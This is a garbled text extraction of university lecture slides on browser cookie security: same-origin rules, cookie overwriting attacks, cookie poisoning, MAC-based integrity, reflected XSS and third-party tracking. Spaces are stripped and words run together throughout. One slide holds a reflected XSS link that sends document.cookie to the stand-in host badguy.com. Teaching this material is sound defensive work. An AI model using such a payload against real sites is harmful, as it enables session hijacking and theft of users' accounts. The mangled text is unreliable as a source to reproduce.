overwritesphpecho

CookieSameOriginPolicyDanBonehCS142Winter2009Monday:sessionmanagementusingcookiesSameoriginpolicy:"highlevel"Review:SameOriginPolicy(SOP)forDOM:OriginAcanaccessoriginB'sDOMifmatchon(scheme,domain,port)Today:SameOriginalPolicy(SOP)forcookies:Generallyspeaking,basedon:([scheme],domain,path)optionalscheme://domain:port/pathparamsscopeSetting/deletingcookiesbyserverDeletecookiebysetting"expires"todateinpastDefaultscopeisdomainandpathofsettingURLBrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;domain=(whentosend);path=(whentosend)secure=(onlysendoverSSL);expires=(whenexpires);HttpOnly(later)ifexpires=NULL:thissessiononlyScopesettingrules(writeSOP)domain:anydomain-suffixofURL-hostname,exceptTLDexample:host="login.
site.
com"login.
site.
comcansetcookiesforallof.
site.
combutnotforanothersiteorTLDProblematicforsiteslike.
stanford.
edupath:canbesettoanythingalloweddomainslogin.
site.
com.
site.
comdisalloweddomainsuser.
site.
comothersite.
com.
comCookiesareidentifiedby(name,domain,path)Bothcookiesstoredinbrowser'scookiejar;bothareinscopeoflogin.
site.
comcookie1name=useridvalue=testdomain=login.
site.
compath=/securecookie2name=useridvalue=test123domain=.
site.
compath=/securedistinctcookiesReadingcookiesonserver(readSOP)BrowsersendsallcookiesinURLscope:cookie-domainisdomain-suffixofURL-domain,andcookie-pathisprefixofURL-path,and[protocol=HTTPSifcookieis"secure"]Goal:serveronlyseescookiesinitsscopeBrowserServerGET//URL-domain/URL-pathCookie:NAME=VALUEExampleshttp://checkout.
site.
com/http://login.
site.
com/https://login.
site.
com/cookie1name=useridvalue=u1domain=login.
site.
compath=/securecookie2name=useridvalue=u2domain=.
site.
compath=/non-securebothsetbylogin.
site.
comcookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2(arbitraryorder)Clientsideread/write:document.
cookieSettingacookieinJavascript:document.
cookie="name=value;expires=…;"Readingacookie:alert(document.
cookie)printsstringcontainingallcookiesavailablefordocument(basedon[protocol],domain,path)Deletingacookie:document.
cookie="name=;expires=Thu,01-Jan-70"document.
cookieoftenusedtocustomizepageinJavascriptjavascript:alert(document.
cookie)JavascriptURLDisplaysallcookiesforcurrentdocumentViewing/deletingcookiesinBrowserUICookieprotocolproblemsServerisblind:Doesnotseecookieattributes(e.
g.
secure)DoesnotseewhichdomainsetthecookieServeronlysees:Cookie:NAME=VALUEExample1:loginserverproblemsAlicelogsinatlogin.
site.
comlogin.
site.
comsetssession-idcookiefor.
site.
comAlicevisitsevil.
site.
comoverwrites.
site.
comsession-idcookiewithsession-idofuser"badguy"Alicevisitscs142hw.
site.
comtosubmithomework.
cs142hw.
site.
comthinksitistalkingto"badguy"Problem:cs142hwexpectssession-idfromlogin.
site.
com;cannottellthatsession-idcookiewasoverwrittenExample2:"secure"cookiesarenotsecureAlicelogsinathttps://www.
google.
com/accountsAlicevisitshttp://www.
google.
com(cleartext)NetworkattackercaninjectintoresponseSet-Cookie:LSID=badguy;secureandoverwritesecurecookieProblem:networkattackercanre-writeHTTPScookies!
HTTPScookievaluecannotbetrustedInteractionwiththeDOMSOPCookieSOP:pathseparationx.
com/Adoesnotseecookiesofx.
com/BNotasecuritymeasure:DOMSOP:x.
com/AhasaccesstoDOMofx.
com/Balert(frames[0].
document.
cookie);Pathseparationisdoneforefficiencynotsecurity:x.
com/AisonlysentthecookiesitneedsCookieshavenointegrity!
!
Storingsecuritydataonbrowser–Usercanchangeanddeletecookievalues!
!
Editcookiefile(FF3:cookies.
sqlite)ModifyCookieheader(FF:TamperDataextension)–Sillyexample:shoppingcartsoftwareSet-cookie:shopping-cart-total=150($)–Usereditscookiefile(cookiepoisoning):Cookie:shopping-cart-total=15($)Similartoproblemwithhiddenfields1617Notsosilly…(asof2/2000)D3.
COMPtyLtd:ShopFactory5.
8@RetailCorporation:@RetailAdgrafix:CheckItOutBaronConsultingGroup:WebSiteToolComCityCorporation:SalesCartCrestedButteSoftware:EasyCartDansie.
net:DansieShoppingCartIntelligentVendingSystems:IntellivendMake-a-Store:Make-a-StoreOrderPageMcMurtrey/Whitaker&Associates:Cart323.
0pknutsen@nethut.
no:CartMan1.
04RichMediaTechnologies:JustAddCommerce5.
0SmartCart:SmartCartWebExpress:Shoptron1.
2Source:http://xforce.
iss.
net/xforce/xfdb/4621Solution:cryptographicchecksums"value"shouldalsocontaindatatopreventcookiereplayandswapGoal:dataintegrityRequiressecretkeykunknowntobrowserBrowserServerkSet-Cookie:NAME=valueTCookie:NAME=valueTGeneratetag:T←F(k,value)Verifytag:T=F(k,value)19Example:.
NET2.
0–System.
Web.
Configuration.
MachineKeySecretwebserverkeyintendedforcookieprotectionStoredonallwebserversinsiteCreatinganencryptedcookiewithintegrity:–HttpCookiecookie=newHttpCookie(name,val);HttpCookieencodedCookie=HttpSecureCookie.
Encode(cookie);Decryptingandvalidatinganencryptedcookie:–HttpSecureCookie.
Decode(cookie);Cookietheft:basiccrosssitescripting(XSS)Example:reflectedXSSsearchfieldonvictim.
com:http://victim.
com/search.
phpterm=appleServer-sideimplementationofsearch.
php:SearchResultsResultsfor:.
.
.
echosearchtermintoresponseBadinputConsiderlink:(properlyURLencoded)http://victim.
com/search.
phpterm=window.
open("http://badguy.
comcookie="+document.
cookie)Whatifuserclicksonthislink1.
Browsergoestovictim.
com/search.
php2.
Victim.
comreturnsResultsfor…3.
Browserexecutesscript:Sendsbadguy.
comcookieforvictim.
com23SowhatWhywoulduserclickonsuchalinkPhishingemailLinkindoubleclickbannerad…manymanywaystofooluserintoclickingMANYotherformsofXSS(monday)ManydonotrequireclickingonlinksHttpOnlyCookiesIE6SP1,FF2.
0.
0.
5BrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;HttpOnlyCookiesentoverHTTP(s),butnotaccessibletoscriptscannotbereadviadocument.
cookieAlsoblocksaccessfromXMLHttpRequestheadersHelpspreventcookietheftviaXSS…butdoesnotstopmostotherrisksofXSSbugs.
(notSafari)THEEND3rdPartyCookies:usertracking3rdpartycookiesWhattheyare:UsergoestositeA.
com;obtainspagePagecontainsBrowsergoestoB.
com;obtainspageHTTPresponsecontainscookieCookiefromB.
comiscalleda3rdpartycookieTracking:UsergoestositeD.
comD.
comcontainsB.
comobtainscookiesetwhenvisitedA.
comB.
comknowsuservisitedA.
comandD.
comCanweblock3rdpartycookiesIEandSafari:blockset/writeIgnorethe"Set-Cookie"HTTPheaderfrom3rdpartiesSitesetscookieasa1stparty;willbegivencookiewhencontactedasa3rdpartyEnabledbydefaultinIE7FirefoxandOpera:blocksend/readAlwaysimplement"Set-Cookie",butneversendcookiesto3rdpartyBreakssess.
mgmt.
atseveralsites(offbydefault)Effectivenessof3rdpartyblockingIneffectiveforimprovingprivacy3rdpartycanbecomefirstpartyandthensetcookieFlashcookiesnotcontrolledbybrowsercookiepolicyIE8InPrivatebrowsingandChromeincognitoUponexit,deleteallbrowserstatecollectedwhileinprivatebrowsing